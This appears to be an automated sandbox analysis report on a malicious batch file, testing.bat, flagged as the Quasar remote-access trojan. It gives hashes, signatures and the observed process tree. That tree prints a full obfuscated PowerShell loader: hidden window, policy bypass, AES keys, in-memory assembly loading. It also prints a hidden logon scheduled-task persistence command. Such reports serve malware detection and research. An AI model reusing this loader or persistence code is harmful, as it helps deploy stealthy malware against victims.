Analysis
-
max time kernel
0s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-06-2024 22:53
Static task
static1
General
-
Target
testing.bat
-
Size
370KB
-
MD5
df396b97b5de6c7ab17a021681980c9b
-
SHA1
5a794a857884e1ec35eb225397ee6d3a5680af22
-
SHA256
9db155af18a56368ff0d18ab954438bbb14ec90a7cacc603f66ce5468e4bf3c4
-
SHA512
96a6423ff510d21cfa9e385e38c3d65e3b2f65cb3309082b734358e1f7b097be44276b74d64b62c5957bb554f1c97dabd889aedea0306441b4431d57636a3848
-
SSDEEP
6144:ELpy5tbQpHYdQgYl7nIVTgunq/hdnN5cAZVQw3g+glYY8UdKmq5:p7QHY2lboguq//N+AQwfglYvF5
Malware Config
Extracted
quasar
-
reconnect_delay
5000
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3880-75-0x0000000007710000-0x0000000007758000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 3880 powershell.exe 3560 powershell.exe 3460 powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\testing.bat"1⤵PID:5040
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FkenHL2OG+TYr4GLR0foZuRMV6VKNesGlzUIpfTgBFk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QBB/ZOZrEm9IOU0Xu/iBug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRfwC=New-Object System.IO.MemoryStream(,$param_var); $nYQyQ=New-Object System.IO.MemoryStream; $pUpSy=New-Object System.IO.Compression.GZipStream($NRfwC, [IO.Compression.CompressionMode]::Decompress); $pUpSy.CopyTo($nYQyQ); $pUpSy.Dispose(); $NRfwC.Dispose(); $nYQyQ.Dispose(); $nYQyQ.ToArray();}function execute_function($param_var,$param2_var){ $EBCxv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Srqon=$EBCxv.EntryPoint; $Srqon.Invoke($null, $param2_var);}$PfOfJ = 'C:\Users\Admin\AppData\Local\Temp\testing.bat';$host.UI.RawUI.WindowTitle = $PfOfJ;$FHPTQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PfOfJ).Split([Environment]::NewLine);foreach ($yJrJm in $FHPTQ) { if ($yJrJm.StartsWith(':: ')) { $KDOrR=$yJrJm.Substring(3); break; }}$payloads_var=[string[]]$KDOrR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
PID:3560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_650_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_650.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:3460 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_650.vbs"3⤵PID:1564
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_650.bat" "4⤵PID:1892
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FkenHL2OG+TYr4GLR0foZuRMV6VKNesGlzUIpfTgBFk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QBB/ZOZrEm9IOU0Xu/iBug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRfwC=New-Object System.IO.MemoryStream(,$param_var); $nYQyQ=New-Object System.IO.MemoryStream; $pUpSy=New-Object System.IO.Compression.GZipStream($NRfwC, [IO.Compression.CompressionMode]::Decompress); $pUpSy.CopyTo($nYQyQ); $pUpSy.Dispose(); $NRfwC.Dispose(); $nYQyQ.Dispose(); $nYQyQ.ToArray();}function execute_function($param_var,$param2_var){ $EBCxv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Srqon=$EBCxv.EntryPoint; $Srqon.Invoke($null, $param2_var);}$PfOfJ = 'C:\Users\Admin\AppData\Roaming\Windows_Log_650.bat';$host.UI.RawUI.WindowTitle = $PfOfJ;$FHPTQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PfOfJ).Split([Environment]::NewLine);foreach ($yJrJm in $FHPTQ) { if ($yJrJm.StartsWith(':: ')) { $KDOrR=$yJrJm.Substring(3); break; }}$payloads_var=[string[]]$KDOrR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
PID:3880
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD58ba8fc1034d449222856ea8fa2531e28
SHA17570fe1788e57484c5138b6cead052fbc3366f3e
SHA2562e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
SHA5127ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b
-
Filesize
18KB
MD5933fb73dbd2098e46bd27b24fb4031d1
SHA1e8bc25602b11d63dc94c05f68bcb7b4a4e1675d5
SHA256e5b2501f4a722392ae525de052142f2bf2096e71833461d6ee7b5d4a83b8915d
SHA51246c1fcad445cee8db84d11ff1032f4df96180775ad5933ec918b3d38bbd8954e71fa83a22a990b0f195be5d313ce693ba37b1b5261b9914df31619538fa24aaa
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
370KB
MD5df396b97b5de6c7ab17a021681980c9b
SHA15a794a857884e1ec35eb225397ee6d3a5680af22
SHA2569db155af18a56368ff0d18ab954438bbb14ec90a7cacc603f66ce5468e4bf3c4
SHA51296a6423ff510d21cfa9e385e38c3d65e3b2f65cb3309082b734358e1f7b097be44276b74d64b62c5957bb554f1c97dabd889aedea0306441b4431d57636a3848
-
Filesize
115B
MD56d22072f72ca064725151f80cd04bf57
SHA1a6aced68e9de35a293ef2855c64946b9c596f64e
SHA256079389210ed3e04ca1bb335283ff5d37fcfcb97968b8cb173909e4cef7f48ea0
SHA5128177fdb61da79b8e83efa6010333f486d89c53b58f1d9cd30bdcfb19c020b7220196eeddefcf4830731a07a6f7267b4e29621fb42e85ca6cf2f0209b7e71f56e